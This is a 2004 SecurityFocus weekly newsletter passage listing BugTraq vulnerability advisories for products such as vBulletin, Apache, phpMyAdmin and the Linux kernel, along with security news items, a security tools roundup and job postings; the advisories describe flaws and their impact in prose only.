http://www.securityfocus.com/sponsor/FaceTime_sf-news_040706
------------------------------------------------------------------------
I. FRONT AND CENTER
1. Close the E-Mail Wiretap Loophole
2. Multi-Layer Intrusion Detection Systems
3. The Allure and Curse of Complexity
II. BUGTRAQ SUMMARY
1. vBulletin newreply.php Cross-Site Scripting Vulnerability
2. WebSoft HelpDesk PRO SQL Injection Vulnerability
3. WebSoft Infinity WEB SQL Injection Vulnerability
4. MPlayer GUI File Name Buffer Overflow Vulnerability
5. PHPMyFamily Authentication Bypass Vulnerability
6. McMurtrey/Whitaker & Associates Cart32 GetLatestBuilds Scrip...
7. CGIScript.net CSFAQ Script Path Disclosure Vulnerability
8. Apache ap_escape_html Memory Allocation Denial Of Service Vu...
9. CuteNews Multiple Cross-site Scripting Vulnerabilities
10. D-Link AirPlus DI-614+, DI-624, and DI-604 DHCP Server Flood...
11. PowerPortal Multiple Input Validation Vulnerabilities
12. Sun Java Runtime Environment Font Object Assertion Failure D...
13. BEA WebLogic Server And WebLogic Express Application Role Un...
14. Popclient Email Message Buffer Overflow Vulnerability
15. I-Mall Commerce I-mall Script Remote Command Execution Vulne...
16. Microsoft Internet Explorer Cross-Domain Frame Loading Vulne...
17. Dr. Web Unspecified Buffer Overflow Vulnerability
18. phpMyAdmin Multiple Input Validation Vulnerabilities
19. HP-UX ObAM WebAdmin Unspecified Unauthorized Access Vulnerab...
20. HP-UX Undisclosed ARPA Transport Local Denial Of Service Vul...
21. Linux Kernel Sbus PROM Driver Multiple Integer Overflow Vuln...
22. Pavuk Remote Stack-Based Buffer Overrun Vulnerability
23. Linux Kernel IPTables Sign Error Denial Of Service Vulnerabi...
24. HP-UX Netscape Browser Multiple Vulnerabilities
25. Juniper JUNOS Packet Forwarding Engine IPv6 Denial of Servic...
26. Open WebMail Vacation.PL Remote Command Execution Variant Vu...
27. ZyXEL Prestige Router Authentication Password Field Remote D...
28. New Atlanta ServletExec Unauthorized Access Vulnerability
29. RSBAC Jail SUID And SGID File Creation Vulnerability
30. IBM Lotus Domino Server Web Access Malicious Email View Remo...
31. IBM Lotus Domino IMAP Quota Changing Vulnerability
32. FreeBSD Linux Binary Compatibility Memory Access Vulnerabili...
33. Esearch eupdatedb Symbolic Link Vulnerability
34. Netegrity IdentityMinder Multiple Cross-Site Scripting Vulne...
35. Qbik WinGate Information Disclosure Vulnerability
36. IBM Informix I-Spy Local Privilege Escalation Vulnerability
37. SCI Photo Chat Server Cross-Site Scripting Vulnerability
III. SECURITYFOCUS NEWS ARTICLES
1. Gates Defends Microsoft Patch Efforts
2. Wi-fi hopper guilty of cyber-extortion
3. Feds urge secrecy over network outages
4. Bagle source code unleashed
5. IE workaround a non-starter
6. Spanish Zombie PC virus author jailed
IV. SECURITYFOCUS TOP 6 TOOLS
1. mod_auth_nufw 1.0.1
2. Ettercap v0.7.0 pre2
3. Free CPM Cellular Passwords Manager 1.0
4. DumpSIS.pl 0.81
5. CifsPwScanner 1.0.3
6. Wasabi 0.2
V. SECURITYJOBS LIST SUMMARY
1. IT Auditor vacancy UK (Thread)
2. Seeking Information Security Professionals in NYC (Thread)
3. Do you seek an Information Security Expert? (Thread)
4. Sr. Associate - Threat & Vulnerability Management - ... (Thread)
5. New to security field (Thread)
6. Network Security Engineer, NYC (Thread)
7. [WANT] Security or Computer/Tech Support Position (Thread)
8. Security Engineer job opp. @ Reactivity Inc., Belmo... (Thread)
9. Seeking security developers (Thread)
10. Security SW- Tech support- Cupertino, CA- ArcSight (Thread)
11. Information Security with Microsoft emphasis - CA, I... (Thread)
12. Jr. Level Perimeter Security - New York (Thread)
13. Solutions Consultant (SE) - Bay Area (Thread)
14. Security Architect - Boston (Thread)
15. Summertime Positions in Heidelberg, Germany (Thread)
16. MITRE - Information Assurance Architect - Hanover, M... (Thread)
17. Security Consultants: Wash. D.C. or CA- ArcSight (Thread)
18. Security Architect for Federal.- Wash D.C. ArcSight (Thread)
19. WEST COAST SALES ENGINEER (Thread)
20. Security Engineer - LOS ANGELES, CA - Financial Ins... (Thread)
21. Director / VP Business Development--Network Securit... (Thread)
22. IT Security Architect required in the UK (Thread)
VI. INCIDENTS LIST SUMMARY
1. Remote registry changes from an ISA server (Thread)
2. Unknown Malware found csdiv.dll (Thread)
3. Scob infection statistics, etc.. (Thread)
VII. VULN-DEV RESEARCH LIST SUMMARY
NO NEW POSTS FOR THE WEEK 2004-06-29 to 2004-07-06.
VIII. MICROSOFT FOCUS LIST SUMMARY
1. supressing IE (Thread)
2. Non Admin Rights + Visual Studio (Thread)
3. Consumer Security Web Site (Thread)
4. Administrivia: Out of Office Autoreplies (Thread)
5. Article Announcement: Redmond's Butterfly Effect (Thread)
6. SecurityFocus Microsoft Newsletter #195 (Thread)
7. RE: Consumer Security Web Site (Thread)
IX. SUN FOCUS LIST SUMMARY
1. secure NFS problem (Thread)
X. LINUX FOCUS LIST SUMMARY
1. Weird! (Thread)
2. Last login missing (Thread)
3. Error installing Clamav? (Thread)
4. just running tcpdump makes promisc mode? (Thread)
XI. UNSUBSCRIBE INSTRUCTIONS
XII. SPONSOR INFORMATION
I. FRONT AND CENTER
-------------------
1. Close the E-Mail Wiretap Loophole
By Mark Rasch
Some pretty sleazy operators are slipping through a hole in a federal
wiretap law that arguably leaves your e-mail unprotected from snooping.
http://www.securityfocus.com/columnists/253
2. Multi-Layer Intrusion Detection Systems
By Nathan Einwechter
This article discusses framework for a mIDS, a system that brings together
many layers of technology into a single monitoring and analysis engine,
from integrity monitoring software like Tripwire to system logs, IDS logs,
and firewall logs.
http://www.securityfocus.com/infocus/1788
3. The Allure and Curse of Complexity
By Jason Miller
The curse of complexity is the bane of every security administrator, so
UNIX users take your pick: would you like BSD or Linux?
http://www.securityfocus.com/columnists/252
II. BUGTRAQ SUMMARY
-------------------
1. vBulletin newreply.php Cross-Site Scripting Vulnerability
BugTraq ID: 10612
Remote: Yes
Date Published: Jun 26 2004
Relevant URL: http://www.securityfocus.com/bid/10612
Summary:
vBulletin is reportedly affected by a cross-site scripting vulnerability in the newreply.php script. This issue is due to a failure of the application to properly sanitize user-supplied URI input.
An attacker may exploit this issue to have malicious HTML or script code executed in the browser of an unsuspecting user and within the context of a visited web site. This may potentially lead to theft of cookie based authentication credentials, other attacks are also possible.
2. WebSoft HelpDesk PRO SQL Injection Vulnerability
BugTraq ID: 10613
Remote: Yes
Date Published: Jun 26 2004
Relevant URL: http://www.securityfocus.com/bid/10613
Summary:
Reportedly WebSoft HelpDesk PRO is affected by an SQL injection vulnerability. This issue is due to a failure of the application to properly sanitize user supplied URI input.
It is likely that this issue is related to the issue discussed in the vulnerability WebSoft Infinity WEB SQL Injection Vulnerability (BID 10614). This BID will be updated when information becomes available.
An attacker might leverage this issue to inject malicious SQL queries or alter existing ones. This would allow the attacker to manipulate database queries to bypass authentication mechanisms; other attack might also be possible.
3. WebSoft Infinity WEB SQL Injection Vulnerability
BugTraq ID: 10614
Remote: Yes
Date Published: Jun 28 2004
Relevant URL: http://www.securityfocus.com/bid/10614
Summary:
Reportedly WebSoft Infinity WEB is affected by an SQL injection vulnerability. This issue is due to a failure of the application to properly sanitize user supplied URI input.
It is likely that this issue is related to the issue discussed in the vulnerability WebSoft HelpDesk PRO SQL Injection Vulnerability (BID 10613). This BID will be updated when information becomes available.
An attacker might leverage this issue to inject malicious SQL queries or alter existing ones. This would allow the attacker to manipulate database queries to bypass authentication mechanisms; other attack might also be possible.
4. MPlayer GUI File Name Buffer Overflow Vulnerability
BugTraq ID: 10615
Remote: Yes
Date Published: Jun 28 2004
Relevant URL: http://www.securityfocus.com/bid/10615
Summary:
It has been reported that MPlayer when used with the graphical user interface (GUI) is affected by a buffer overflow vulnerability. This issue is due to a failure of the application to properly handle user-supplied strings when copying them into finite buffers.
Successful exploitation would immediately produce a denial of service condition in the affected process. This issue may also be leveraged to execute code on the affected system within the security context of the user running the vulnerable process.
5. PHPMyFamily Authentication Bypass Vulnerability
BugTraq ID: 10616
Remote: Yes
Date Published: Jun 28 2004
Relevant URL: http://www.securityfocus.com/bid/10616
Summary:
phpmyfamily is prone to an authentication bypass vulnerability.
This issue reportedly occurs when the registers_globals PHP configuration directive is enabled. Exploitation could permit an unauthorized remote user to edit site content.
6. McMurtrey/Whitaker & Associates Cart32 GetLatestBuilds Scrip...
BugTraq ID: 10617
Remote: Yes
Date Published: Jun 28 2004
Relevant URL: http://www.securityfocus.com/bid/10617
Summary:
Cart32 is reported prone to a cross-site scripting vulnerability. This issue presents itself due to insufficient sanitization of user-supplied data.
A remote attacker can exploit this issue by creating a malicious link to the vulnerable application that includes hostile HTML and script code. If a user follows this link, the hostile code renders in the web browser of the victim user. Theft of cookie-based authentication credentials and other attacks is possible.
Cart32 version 5.0 and prior are considered prone to this issue.
7. CGIScript.net CSFAQ Script Path Disclosure Vulnerability
BugTraq ID: 10618
Remote: Yes
Date Published: Jun 28 2004
Relevant URL: http://www.securityfocus.com/bid/10618
Summary:
A vulnerability has been identified in the application that may allow an attacker to disclose the installation path.
Successful exploitation of this vulnerability may allow an attacker to gain sensitive information about the file system that may aid in launching more direct attacks against the system.
All current versions of csFAQ are considered vulnerable to this issue.
8. Apache ap_escape_html Memory Allocation Denial Of Service Vu...
BugTraq ID: 10619
Remote: Yes
Date Published: Jun 28 2004
Relevant URL: http://www.securityfocus.com/bid/10619
Summary:
Apache Web Server is reportedly affected by a memory allocation based denial of service vulnerability. This issue is due to a failure of the server to handle excessivley long HTTP header strings.
This issue would allow an attacker to cause the affected application to crash, denying service to legitimate users.
Although Apache version 2.0.49 reportedly affected by this issue, it is likely that earlier versions are affected as well.
9. CuteNews Multiple Cross-site Scripting Vulnerabilities
BugTraq ID: 10620
Remote: Yes
Date Published: Jun 28 2004
Relevant URL: http://www.securityfocus.com/bid/10620
Summary:
It is reported that CuteNews is affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input.
The problems present themselves when malicious HTML and script code is sent to the application through the 'id' parameter of the multiple scripts.
These issues could permit a remote attacker to create a malicious URI link that includes hostile HTML and script code. If this link were followed, the hostile code may be rendered in the web browser of the victim user.
10. D-Link AirPlus DI-614+, DI-624, and DI-604 DHCP Server Flood...
BugTraq ID: 10621
Remote: Yes
Date Published: Jun 27 2004
Relevant URL: http://www.securityfocus.com/bid/10621
Summary:
The D-Link DI-614+, DI-624, and DI-604 are reported susceptible to a denial of service vulnerability in their DHCP service.
By flooding the DHCP service with valid DHCP requests, the device will reportedly consume all available memory and eventually reboot.
An attacker may be able to deny service to legitimate users of an affected device by repeatedly causing the device to reboot.
The DI-614+ with firmware revision 2.30, and the DI-604 with unknown firmware were reported vulnerable. The DI-624 Revision B was also confirmed susceptible.
11. PowerPortal Multiple Input Validation Vulnerabilities
BugTraq ID: 10622
Remote: Yes
Date Published: Jun 28 2004
Relevant URL: http://www.securityfocus.com/bid/10622
Summary:
PowerPortal is reported prone to multiple vulnerabilities. The issues result from insufficient sanitization of user-supplied data. The following specific issues can affect the application:
PowerPortal is prone to multiple cross-site scripting vulnerabilities. These cross-site scripting issues can permit a remote attacker to create a malicious URI link that includes hostile HTML and script code. If a user follows the malicious link, the attacker-supplied code executes in the Web browser of the victim computer. This attack can allow for theft of cookie-based authentication credentials and other attacks.
Additionally, PowerPortal is prone to an information disclosure vulnerability. It is reported that a remote attacker may reveal directory listings, by supplying directory traversal sequences to the 'modules.php' script.
The information disclosure vulnerability may be employed by the attacker in order to reveal potentially sensitive information regarding the layout of the filesystem on the affected computer.
12. Sun Java Runtime Environment Font Object Assertion Failure D...
BugTraq ID: 10623
Remote: Yes
Date Published: Jun 28 2004
Relevant URL: http://www.securityfocus.com/bid/10623
Summary:
The Sun Java Runtime Environment Font object is reportedly vulnerable to an assertion failure denial of service vulnerability. This issue is due to a failure of the process to handle exceptional conditions when processing font objects.
This issue is reported to affect Java Runtime Environment versions 1.4.1 through 1.4.2; it is likely however that other versions are also affected. This issue will crash Internet browsers running an affected Java plug-in as well.
This issue may be exploited by an attacker to cause a vulnerable application, as well as all processes spawned from the application, to crash, denying service to legitimate users. Due to the scope of the crash, data loss may occur.
13. BEA WebLogic Server And WebLogic Express Application Role Un...
BugTraq ID: 10624
Remote: Yes
Date Published: Jun 29 2004
Relevant URL: http://www.securityfocus.com/bid/10624
Summary:
WebLogic Server And WebLogic Express are affected by a vulnerability that may unauthorized access to application roles. This issue is due to a failure of the application to properly implement the Servlet 2.3 specification, facilitating unauthorized access.
It should be noted that this issue only arises when a web application is built using the '*' specifier within the '<role-name>' tags, resources are defined to be protected by the '*' specifier, and users exist without explicitly defined roles. Due to the circumstantial nature of this issue, exploitation may be unlikely.
This issue would allow an attacker to carry out actions outside of the defined roles; potentially leading to unauthorized access or other attacks.
14. Popclient Email Message Buffer Overflow Vulnerability
BugTraq ID: 10625
Remote: Yes
Date Published: Jun 29 2004
Relevant URL: http://www.securityfocus.com/bid/10625
Summary:
It has been reported that popclient is affected by an off by one buffer overflow vulnerability. This issue is due to a failure of the application to properly manage static stack-based buffers.
Successful exploitation of this issue may cause a denial of service condition in the affected application; it is unlikely that this issue could be leveraged to execute code, however it may be possible.
15. I-Mall Commerce I-mall Script Remote Command Execution Vulne...
BugTraq ID: 10626
Remote: Yes
Date Published: Jun 29 2004
Relevant URL: http://www.securityfocus.com/bid/10626
Summary:
i-mall.cgi is reported prone to a remote arbitrary command execution vulnerability. This issue presents itself due to insufficient sanitization of user-supplied data and may allow a remote attacker to pass arbitrary shell commands to the vulnerable script.
16. Microsoft Internet Explorer Cross-Domain Frame Loading Vulne...
BugTraq ID: 10627
Remote: Yes
Date Published: Jun 29 2004
Relevant URL: http://www.securityfocus.com/bid/10627
Summary:
Microsoft Internet Explorer is reported prone to a cross-domain frame loading vulnerability. It is reported that if the name of a frame rendered in a target site is known, then an attacker may potentially render arbitrary HTML in the frame of the target site.
An attacker may exploit this vulnerability to spoof an interface of a trusted web site.
17. Dr. Web Unspecified Buffer Overflow Vulnerability
BugTraq ID: 10628
Remote: Yes
Date Published: Jun 29 2004
Relevant URL: http://www.securityfocus.com/bid/10628
Summary:
It has been reported that an unspecified buffer overflow vulnerability exists in Dr. Web.
Users of Dr. Web have reported seeing this message logged to syslog by ProPolice on OpenBSD computers:
drwebd: stack overflow in function int scanMail(int, time_t *, int, int, const char *)
An unspecified buffer overflow in the scanMail() function may be exploitable. If it is, attempts to exploit it may result in the affected application crashing. This may also be leveraged to execute arbitrary code in the context of the Dr. Web process.
As more information is known, this BID will be updated.
18. phpMyAdmin Multiple Input Validation Vulnerabilities
BugTraq ID: 10629
Remote: Yes
Date Published: Jun 29 2004
Relevant URL: http://www.securityfocus.com/bid/10629
Summary:
phpMyAdmin is prone to multiple vulnerabilities. The issues result from insufficient sanitization of user-supplied data. The following specific issues can affect the application:
It is reported that a malicious attacker can add arbitrary servers to phpMyAdmin. By constructing a URI request for the phpMyAdmin 'left.php' script an attacker may specify and add an arbitrary SQL server.
A remote attacker may exploit this vulnerability to replace server configurations and as a result introduce a malicious SQL server into the phpMyAdmin controlled server list.
phpMyAdmin is reported prone to a remote PHP code execution vulnerability. It is reported that a malicious database table name beginning with "'" will escape the quotes in a PHP eval() statement and will thereby permit an attacker to execute arbitrary PHP code.
19. HP-UX ObAM WebAdmin Unspecified Unauthorized Access Vulnerab...
BugTraq ID: 10630
Remote: Yes
Date Published: Jun 28 2004
Relevant URL: http://www.securityfocus.com/bid/10630
Summary:
HP-UX ObAM WebAdmin is reported prone to an unspecified vulnerability. This issue may allow a remote attacker to gain unauthorized access to a vulnerable computer.
HP-UX B.11.11 is reported prone to this issue.
Due to a lack of details, further information is not available at the moment. This BID will be updated as more information becomes available.
20. HP-UX Undisclosed ARPA Transport Local Denial Of Service Vul...
BugTraq ID: 10631
Remote: No
Date Published: Jun 29 2004
Relevant URL: http://www.securityfocus.com/bid/10631
Summary:
HP-UX is reported vulnerable to an undisclosed local denial of service vulnerability.
Reportedly, there exists a flaw in HP-UX's ARPA transport which could be leveraged by a local user to crash the computer.
21. Linux Kernel Sbus PROM Driver Multiple Integer Overflow Vuln...
BugTraq ID: 10632
Remote: No
Date Published: Jun 29 2004
Relevant URL: http://www.securityfocus.com/bid/10632
Summary:
It is reported that the OpenPROM Linux kernel driver contains multiple integer overflow vulnerabilities.
Two vulnerabilities are reported to exist in the OpenPROM driver, both involve overflowing an integer value. These values are used to allocate kernel memory, and then subsequently to copy data into the kernel. This could lead to overwriting large amounts of kernel memory.
These vulnerabilities could lead to a system crash, or possible code execution in the context of the kernel.
Some versions of the Linux kernel are vulnerable to both overflows, other versions are only susceptible to one. Kernel version 2.6.6 does not appear to be vulnerable.
22. Pavuk Remote Stack-Based Buffer Overrun Vulnerability
BugTraq ID: 10633
Remote: Yes
Date Published: Jun 30 2004
Relevant URL: http://www.securityfocus.com/bid/10633
Summary:
Pavuk is reported prone to a remote buffer overrun vulnerability. It is reported that the issue exists due to a lack of boundary checks performed on third party data, that is received from remote HTTP servers, before the data is copied into a finite stack-based buffer.
Ultimately a remote malicious site may exploit this condition to execute arbitrary code in the context of the user who is running the vulnerable Pavuk software.
23. Linux Kernel IPTables Sign Error Denial Of Service Vulnerabi...
BugTraq ID: 10634
Remote: Yes
Date Published: Jun 30 2004
Relevant URL: http://www.securityfocus.com/bid/10634
Summary:
It has been reported that the Linux kernel is affected by a denial of service vulnerability in the iptables implementation. This issue is due to a failure of iptables to handle certain TCP packet header values.
An attacker can exploit this issue to cause the iptables implementation to consume all CPU resources due to an infinite loop, denying service to legitimate users.
24. HP-UX Netscape Browser Multiple Vulnerabilities
BugTraq ID: 10635
Remote: Yes
Date Published: Jun 30 2004
Relevant URL: http://www.securityfocus.com/bid/10635
Summary:
HP-UX Netscape browser is reported prone to multiple vulnerabilities. These vulnerabilities can allow a remote attacker to carry out attacks such as denial of service, information disclosure, and unauthorized access to a vulnerable computer.
These issues affect Netscape for HP-UX B.11.00, B.11.11, B.11.22, and B.11.23.
25. Juniper JUNOS Packet Forwarding Engine IPv6 Denial of Servic...
BugTraq ID: 10636
Remote: Yes
Date Published: Jun 30 2004
Relevant URL: http://www.securityfocus.com/bid/10636
Summary:
Juniper routers running the JUNOS operating system are reported prone to a denial of service vulnerability due to memory exhaustion. An attacker can cause a persistent denial of service condition by repeatedly sending certain IPv6 packets to a router.
This issue affects the JUNOS Packet Forwarding Engine IPv6 branch released after February 24, 2004. All Juniper Networks M-series and T-series routing platforms with IPv6 support are also prone to this issue.
26. Open WebMail Vacation.PL Remote Command Execution Variant Vu...
BugTraq ID: 10637
Remote: Yes
Date Published: Jun 30 2004
Relevant URL: http://www.securityfocus.com/bid/10637
Summary:
A vulnerability is reported in Open WebMail that allows a remote attacker to execute arbitrary commands on a vulnerable host.
Exploitation of the vulnerability could allow a non-privileged user to remotely execute arbitrary commands in the context of the web server that is hosting the vulnerable application.
This vulnerability is reported to affect all versions of Open WebMail released before 29/06/2004.
27. ZyXEL Prestige Router Authentication Password Field Remote D...
BugTraq ID: 10638
Remote: Yes
Date Published: Jun 30 2004
Relevant URL: http://www.securityfocus.com/bid/10638
Summary:
ZyXEL Prestige routers are reported prone to a remote denial of service vulnerability. The issue is reported to exist due to a lack of boundary checks performed on password string data handled by the device authentication interface.
A remote attacker who has access to the authentication interface of the affected appliance may trigger a device reset at will, effectively denying service to legitimate users.
28. New Atlanta ServletExec Unauthorized Access Vulnerability
BugTraq ID: 10639
Remote: Yes
Date Published: Jun 30 2004
Relevant URL: http://www.securityfocus.com/bid/10639
Summary:
It has been reported that New Atlanta ServletExec is affected by an unauthorized access vulnerability; fixes are available. This issue is due to an access validation error.
This issue would allow an attacker to upload and execute files on the affected computer, facilitating unauthorized interactive access as well as other attacks. This issue might also be leveraged to cause a denial of service condition in the affected server.
29. RSBAC Jail SUID And SGID File Creation Vulnerability
BugTraq ID: 10640
Remote: No
Date Published: Jun 30 2004
Relevant URL: http://www.securityfocus.com/bid/10640
Summary:
The process jail feature of RSBAC reportedly improperly allows files to be created with SUID and SGID attributes.
These files can then be used to escalate the privileges inside the jail. This may allow for further attacks and possible system compromises.
Versions 1.2.2 and 1.2.3 are reported to be vulnerable to this issue. A patch has been released by the vendor.
30. IBM Lotus Domino Server Web Access Malicious Email View Remo...
BugTraq ID: 10641
Remote: Yes
Date Published: Jun 30 2004
Relevant URL: http://www.securityfocus.com/bid/10641
Summary:
Lotus Domino Server is reported prone to a remote denial of service vulnerability. The issue is reported to exist when a malicious email that is received on the affected server, is opened through the Domino Web Access interface by a client.
A remote attacker may exploit this condition to deny Lotus Domino service to legitimate users.
31. IBM Lotus Domino IMAP Quota Changing Vulnerability
BugTraq ID: 10642
Remote: Yes
Date Published: Jun 30 2004
Relevant URL: http://www.securityfocus.com/bid/10642
Summary:
IBM Lotus Domino server is reported to improperly allow users to alter their own mail storage quota values.
A user's mailbox is assigned a quota to limit the amount of data that can be consumed by email on the server. This quota is assigned by the administrator of the application.
An attacker could possibly use this vulnerability to raise their mailbox's quota to a very large amount, and then proceed to fill the mail servers storage device. This will result in a denial of service condition, where new mail will not be able to be stored on the full disk.
Domino version 6.5.0 and 6.5.1 are reported vulnerable to this issue.
32. FreeBSD Linux Binary Compatibility Memory Access Vulnerabili...
BugTraq ID: 10643
Remote: No
Date Published: Jul 01 2004
Relevant URL: http://www.securityfocus.com/bid/10643
Summary:
It has been reported that FreeBSD is affected by a memory access vulnerability when implementing linux binary compatibility. This issue is due to a programming error that causes certain memory to be accessed without proper validation.
This issue would allow an attacker to disclose and overwrite kernel memory, resulting in information disclosure, privilege escalation and potential denial of service.
33. Esearch eupdatedb Symbolic Link Vulnerability
BugTraq ID: 10644
Remote: No
Date Published: Jul 01 2004
Relevant URL: http://www.securityfocus.com/bid/10644
Summary:
It has been reported that eupdatedb, an esearch utility is affected by a symbolic link vulnerability. This issue is due to a failure of the application to properly handle temporary file creation.
An attacker can leverage this vulnerability to create an arbitrary file with the permissions of an unsuspecting user that has activated the vulnerable utility; facilitating a number of possible attacks.
34. Netegrity IdentityMinder Multiple Cross-Site Scripting Vulne...
BugTraq ID: 10645
Remote: Yes
Date Published: Jul 01 2004
Relevant URL: http://www.securityfocus.com/bid/10645
Summary:
Netegrity IdentityMinder is a tool designed for the Microsoft Windows platform to manage and maintain users and user accounts. The tool supports a web based interface for creating and removing users in multi-user environments.
It has been reported that Netegrity IdentityMinder is affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input.
A remote attacker can exploit this issue by creating a malicious link to the vulnerable application that includes hostile HTML and script code. If this link were followed by an unsuspecting user, the hostile code may be rendered in the their web browser. This would occur in the security context of the web server and may allow for theft of cookie-based authentication credentials as well as arbitrary application command execution.
35. Qbik WinGate Information Disclosure Vulnerability
BugTraq ID: 10646
Remote: Yes
Date Published: Jul 02 2004
Relevant URL: http://www.securityfocus.com/bid/10646
Summary:
WinGate is reported susceptible to an information disclosure vulnerability in its HTTP proxy server.
An internal web server contained in WinGate improperly allows attackers access to read arbitrary files outside of its document root. WinGate by default runs as the localsystem user, therefore this vulnerability allows remote attackers to read system files.
An attacker can exploit this issue to read arbitrary files contained on the WinGate computer. These files may contain sensitive information that may aid in further attacks.
36. IBM Informix I-Spy Local Privilege Escalation Vulnerability
BugTraq ID: 10647
Remote: No
Date Published: Jul 02 2004
Relevant URL: http://www.securityfocus.com/bid/10647
Summary:
It is reported that I-Spy is susceptible to a privilege escalation vulnerability in its 'runbin' binary.
The 'runbin' binary uses its argv[0] to determine both the name of a binary to run, and the path to that binary. 'runbin' is installed setuid root by default.
An attacker with local interactive access to a computer with an affected version of I-Spy installed would be able to exploit this fact to cause attacker specified binaries to be run as the superuser.
I-Spy version 2.x is reported vulnerable to this issue.
37. SCI Photo Chat Server Cross-Site Scripting Vulnerability
BugTraq ID: 10648
Remote: Yes
Date Published: Jul 02 2004
Relevant URL: http://www.securityfocus.com/bid/10648
Summary:
SCI Photo Chat is reported susceptible to a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input.
The web server component of SCI Chat server will display an error message when it receives an HTTP request for an invalid file. This error message includes the complete unsanitized content of the original request.
A remote attacker can exploit this issue by creating a malicious link to the vulnerable application that includes hostile HTML and script code. If this link were followed by an unsuspecting user, the hostile code may be rendered in the their web browser. This would occur in the security context of the web server and may allow for theft of cookie-based authentication credentials or other attacks.
III. SECURITYFOCUS NEWS ARTICLES
--------------------------------
1. Gates Defends Microsoft Patch Efforts
By: Patrick Gray
Microsoft chairman downplays the role that unpatched vulnerabilities played in last week's Russian hack attacks.
http://www.securityfocus.com/news/9004
2. Wi-fi hopper guilty of cyber-extortion
By: Kevin Poulsen
FBI agents initially traced threats to a suburban dentist's office, and other spots with unsecured wireless networks.
http://www.securityfocus.com/news/8991
3. Feds urge secrecy over network outages
By: Kevin Poulsen
The Department of Homeland Security wants details of major service outages kept out of the public eye.
http://www.securityfocus.com/news/8966
4. Bagle source code unleashed
By: John Leyden, The Register
Virus writers are distributing viral source code with the latest version of the Bagle virus series, Bagle-AD. Much like its 29 predecessors, Bagle-AD is a mass-mailing worm that is packed using UPX file compression.
http://www.securityfocus.com/news/9059
5. IE workaround a non-starter
By: John Leyden, The Register
Doubts have been raised about the effectiveness of a workaround issued by Microsoft to guard against a potentially devastating vulnerability in IE. Left unchecked the flaw creates a means for hackers to turn popular websites into conduits for viral transmission.
http://www.securityfocus.com/news/9054
6. Spanish Zombie PC virus author jailed
By: John Leyden, The Register
A Spanish man was sent to jail for two years last week after being convicted of virus writing. Óscar López Hinarejos, 26, was also ordered to pay compensation to his victims for writing the Cabronator Trojan.
http://www.securityfocus.com/news/9053
IV. SECURITYFOCUS TOP 6 TOOLS
-----------------------------
1. mod_auth_nufw 1.0.1
By: Vincent Deffontaines
Relevant URL: http://freshmeat.net/redir/modauthnufw/51307/url_homepage/article.php3
Platforms:
Summary:
mod_auth_nufw is a Single Sign On Apache module which performs secure user identification and authentication, based on the Nufw firewalling suite. Nufw marks all connections of a network with a unique UserID. This module takes advantage of that mark and uses it to transparently identify and authenticate users requiring access to an Apache server.
2. Ettercap v0.7.0 pre2
By: ALoR <alor (at) users.sourceforge (dot) net [email concealed]>
Relevant URL: http://ettercap.sourceforge.net/
Platforms: FreeBSD, Linux, MacOS, NetBSD, Windows 2000, Windows NT, Windows XP
Summary:
Ettercap is a network sniffer/interceptor/logger for ethernet LANs. It supports active and passive dissection of many protocols (even ciphered ones, like SSH and HTTPS). Data injection in an established connection and filtering on the fly is also possible, keeping the connection synchronized. Many sniffing modes were implemented to give you a powerful and complete sniffing suite. Plugins are supported. It has the ability to check whether you are in a switched LAN or not, and to use OS fingerprints (active or passive) to let you know the geometry of the LAN.
3. Free CPM Cellular Passwords Manager 1.0
By:
Relevant URL: http://www.mycell.org/megaas/security/V2demos2.asp
Platforms: Java
Summary:
Enter our downloads page to find the free Cellular Passwords Manager.A J2ME program that will manage all your sites/accounts passwords and IDs.The program is PIN protected, simple Menu driven.
This program is part of the CAT Cellular Authentication token. The CAT manages the OTPs and Fixed IDs/Passwords accounts.
4. DumpSIS.pl 0.81
By: Jimmy Shah
Relevant URL: http://www.geocities.com/jfldars/DumpSIS.zip
Platforms: Perl (any system supporting perl)
Summary:
Symbian SIS file dumping utility that allows for analysis of potential malware without actual installation of files.
It has been field tested by various Antivirus researchers, who used it to help analyze the the recent Symbian Carib Worm.
5. CifsPwScanner 1.0.3
By: Patrik Karlsson
Relevant URL: http://www.cqure.net/tools/cifspwscan-bin-1_0_3.tar.gz
Platforms: Java
Summary:
A CIFS/SMB password scanner based on the jcifs implementation. The scanner and jcifs are both 100% pure java, making it possible to run the scanner on a few different platforms.
6. Wasabi 0.2
By: Andrea Barisani
Relevant URL: http://www.gentoo.org/proj/en/infrastructure/wasabi
Platforms: Perl (any system supporting perl)
Summary:
Wasabi is a log monitoring program, designed to watch a log file for lines matching user defined regular expression and report on the matches. The regular expressions are assigned to queues which have an alert interval and a list of mail recipients.
Queues can be set to send a notification as soon as there is a log line assigned to it, or to send periodic reports.
Additionally, uninteresting fields in the log lines (such as PID numbers) can be masked with the standard regular ex
V. SECURITYJOBS LIST SUMMARY
----------------------------
1. IT Auditor vacancy UK (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/368053
2. Seeking Information Security Professionals in NYC (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/368030
3. Do you seek an Information Security Expert? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/367973
4. Sr. Associate - Threat & Vulnerability Management - ... (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/367938
5. New to security field (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/367936
6. Network Security Engineer, NYC (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/367934
7. [WANT] Security or Computer/Tech Support Position (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/367929
8. Security Engineer job opp. @ Reactivity Inc., Belmo... (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/367927
9. Seeking security developers (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/367926
10. Security SW- Tech support- Cupertino, CA- ArcSight (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/367925
11. Information Security with Microsoft emphasis - CA, I... (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/367920
12. Jr. Level Perimeter Security - New York (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/367919
13. Solutions Consultant (SE) - Bay Area (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/367917
14. Security Architect - Boston (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/367915
15. Summertime Positions in Heidelberg, Germany (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/367913
